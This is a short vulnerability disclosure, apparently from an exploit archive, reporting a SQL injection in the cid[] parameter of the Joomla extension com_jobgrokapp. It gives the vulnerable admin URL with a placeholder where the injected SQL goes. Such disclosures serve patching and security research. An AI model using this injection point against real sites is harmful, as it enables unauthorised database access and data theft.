Joomla JobGrokApp 3.1-1.2.55 SQL Injection
Posted on 07 June 2016
###################### # Exploit Title : Joomla com_jobgrokapp - SQL Injection # Exploit Author : Persian Hack Team # Vendor Homepage : http://extensions.joomla.org/extension/job-grok-app # Software Link: http://www.uplooder.net/f/tl/42/ae553152683fc9d97a555210d7028a8c/com-jobgrokapp-V3.1-1.2.55.zip # Category: [ Webapps ] # Tested on: [ Win ] # Version: 3.1-1.2.55 # Date: 2016/06/07 ###################### # # PoC: # Login with Admin User And Edit one Applications cid[] Parameter Vulnerable to SQL Injection # Demo : # http://localhost/joomla/administrator/index.php?option=com_jobgrokapp&controller=application&task=edit&cid[]=[SQL] # Image: http://www.uplooder.net/img/image/30/de1049a0eb485c78590332d185ee7189/com-jobgrokapp.png # ###################### # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : persian-team.ir ######################
